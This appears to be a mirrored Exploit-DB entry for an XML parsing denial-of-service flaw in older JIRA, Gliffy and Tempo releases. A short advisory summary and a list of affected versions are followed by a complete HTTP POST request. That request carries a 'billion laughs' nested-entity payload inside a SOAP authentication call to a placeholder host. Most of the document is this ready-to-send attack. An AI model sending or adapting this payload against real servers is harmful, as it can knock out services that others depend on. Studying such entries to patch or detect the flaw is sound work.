Atlassian Tempo 6.4.3 / JIRA 5.0.0 / Gliffy 3.7.0 – XML Parsing Denial of Service - 体验盒子

作者： anonymous

日期： 2012-05-17

类别：

dos

平台：

jsp

来源：https://www.exploit-db.com/exploits/37218/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

source: https://www.securityfocus.com/bid/53595/info

JIRA, and the Gliffy and Tempo plugins for JIRA are prone to a denial-of-service vulnerability because they fail to properly handle crafted XML data.

Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an affected application.

The following versions are affected:

Versions prior to JIRA 5.0.1 are vulnerable.

Versions prior to Gliffy 3.7.1 are vulnerable.

Versions prior to Tempo versions 6.4.3.1, 6.5.1, and 7.0.3 are vulnerable.

POST somehost.com HTTP/1.1

Accept-Encoding: gzip,deflate

Content-Type: text/xml;charset=UTF-8

SOAPAction: ""

User-Agent: Jakarta Commons-HttpClient/3.1

Host: somehost.com

Content-Length: 1577

<?xml version="1.0" encoding="utf-8" ?>

<!DOCTYPE lolz [

<!ENTITY lol "lol">

<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">

<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">

<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">

<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">

<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">

<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">

<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">

<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">

]>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SecurityServer" xmlns:aut="http://authentication.integration.crowd.atlassian.com">

<soapenv:Header/>

<soapenv:Body>

<urn:authenticateApplication>

<urn:in0>

<aut:credential>

<aut:credential>stuff1</aut:credential>

<aut:encryptedCredential>?&lol9;</aut:encryptedCredential>

</aut:credential>

<aut:name>stuff3</aut:name>

<aut:validationFactors>

<aut:ValidationFactor>

<aut:name>stuff4</aut:name>

<aut:value>stuff5</aut:value>

</aut:ValidationFactor>

</aut:validationFactors>

</urn:in0>

</urn:authenticateApplication>

</soapenv:Body>

</soapenv:Envelope>